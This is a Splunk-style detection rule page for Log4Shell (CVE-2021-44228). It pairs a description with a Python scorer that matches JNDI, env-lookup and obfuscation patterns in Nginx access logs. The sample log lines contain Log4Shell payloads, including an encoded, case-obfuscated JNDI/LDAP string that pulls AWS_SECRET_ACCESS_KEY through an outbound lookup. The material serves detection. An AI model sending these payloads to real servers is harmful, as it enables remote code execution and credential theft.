Hunting for Log4Shell

Splunk Security Content

Summary
This detection rule targets the Log4Shell vulnerability (CVE-2021-44228) by using the Splunk Web datamodel to identify exploitation attempts carried in HTTP requests, typically in headers such as User-Agent or in the request URI. Each request is evaluated for indicators characteristic of Log4Shell exploitation: JNDI lookup strings (the ${jndi:...} trigger that causes the vulnerable logger to load a remote class and execute code), environment-variable lookups (${env:...}), which attackers embed in the payload to leak secrets such as cloud credentials through the outbound lookup, and URI patterns associated with known exploit payloads.

The rule parses Nginx access logs, applies a series of regular-expression matches to each event, and combines the matches into a Score. Events whose Score exceeds 2 are surfaced for investigation, so that a single weak indicator (for example, a protocol keyword appearing in an otherwise ordinary request) does not raise an alert on its own, while a combination of indicators does.

Because exploitation of this vulnerability is high-impact, analysts must triage scored events to separate real attacks from false positives; scanner traffic and benign strings that happen to resemble lookup syntax can both score. The rule is intended to be tuned over time: adjust the per-pattern scoring and the threshold so that true positives are not missed while noise from benign requests stays low.
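The scoring approach described above, as an added example that is not the Splunk rule's own SPL: a small Python scorer run over constructed Nginx access-log lines. The indicator patterns and weights are this example's assumptions (the real rule's regexes and weights are not reproduced here); only the threshold, Score > 2, comes from the page. The example also percent-decodes each event and folds single-character ${lower:x}/${upper:x} lookups before matching, which is why the obfuscated sample still scores.

```python
import re
from urllib.parse import unquote

# Constructed Nginx access-log lines for this example (not real traffic;
# 203.0.113.0/24 is a documentation address range).
SAMPLE_LOGS = [
    # 0: ordinary request, should score 0
    '10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET /index.html HTTP/1.1" '
    '200 512 "-" "Mozilla/5.0"',
    # 1: plain JNDI/LDAP lookup carried in the User-Agent header
    '203.0.113.7 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 512 '
    '"-" "${jndi:ldap://203.0.113.9:1389/a}"',
    # 2: URL-encoded, case-lookup-obfuscated JNDI string in the query, plus an
    #    env: lookup that would leak an AWS secret through the outbound LDAP request
    '203.0.113.8 - - [10/Dec/2021:12:00:03 +0000] "GET /?x=%24%7B%24%7Blower%3Aj'
    '%7Dndi%3Aldap%3A%2F%2F203.0.113.9%2F%24%7Benv%3AAWS_SECRET_ACCESS_KEY%7D%7D '
    'HTTP/1.1" 400 0 "-" "curl/7.79"',
    # 3: benign path that merely contains a protocol keyword; a weak signal only
    '10.0.0.6 - - [10/Dec/2021:12:00:04 +0000] "GET /docs/ldap:config HTTP/1.1" '
    '200 100 "-" "Mozilla/5.0"',
]

# Hypothetical indicator table: (name, pattern, weight). Patterns and weights
# are assumptions made for this example, not the Splunk rule's own values.
INDICATORS = [
    ("jndi_lookup",   re.compile(r"\$\{\s*jndi\s*:", re.I), 4),
    ("jndi_proto",    re.compile(r"jndi\s*:\s*(?:ldaps?|rmi|dns|nis|iiop|corba|nds|https?)\s*:", re.I), 3),
    ("env_lookup",    re.compile(r"\$\{\s*env\s*:", re.I), 3),
    ("nested_lookup", re.compile(r"\$\{[^}]*\$\{"), 3),
    ("proto_keyword", re.compile(r"\b(?:ldaps?|rmi|dns|nis|iiop|corba|nds)\s*:", re.I), 1),
]
# Single-character case lookups such as ${lower:j} used to split the literal "jndi".
CASE_LOOKUP = re.compile(r"\$\{\s*(?:lower|upper)\s*:\s*([A-Za-z])\s*\}", re.I)
OBFUSCATION_WEIGHT = 3  # assumed weight for the presence of such lookups
THRESHOLD = 2           # the rule's "Score > 2"


def percent_decode(text: str, max_rounds: int = 3) -> str:
    """Undo URL encoding, repeating a few times to catch double-encoded payloads."""
    for _ in range(max_rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text


def fold_case_lookups(text: str) -> str:
    """Resolve ${lower:x}/${upper:x} to the bare character so 'jndi' becomes
    contiguous again. lower() is enough because matching is case-insensitive."""
    return CASE_LOOKUP.sub(lambda m: m.group(1).lower(), text)


def score_line(raw: str) -> dict:
    """Score one access-log event and report which indicators matched."""
    decoded = percent_decode(raw)
    folded = fold_case_lookups(decoded)
    hits = {name: weight for name, pattern, weight in INDICATORS if pattern.search(folded)}
    if folded != decoded:
        hits["case_lookup_obfuscation"] = OBFUSCATION_WEIGHT
    return {"raw": raw, "score": sum(hits.values()), "hits": sorted(hits)}


def hunt(lines, threshold: int = THRESHOLD) -> list:
    """Return events scoring above the threshold, highest score first."""
    flagged = [r for r in map(score_line, lines) if r["score"] > threshold]
    return sorted(flagged, key=lambda r: r["score"], reverse=True)


if __name__ == "__main__":
    for event in hunt(SAMPLE_LOGS):
        print(event["score"], event["hits"], event["raw"][:60])
```

Sample 3 shows the point of the threshold: a lone "ldap:" in a path scores 1 and is never surfaced, whereas the real payloads accumulate several indicators. When tuning against your own traffic, lower a weight or raise the threshold only after checking which indicator is responsible for the noise; the hits list in each result is there for exactly that.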
Categories
  • Web
  • Network
Data Sources
  • Named Pipe
  • Network Traffic
ATT&CK Techniques
  • T1190
  • T1133
Created: 2024-11-15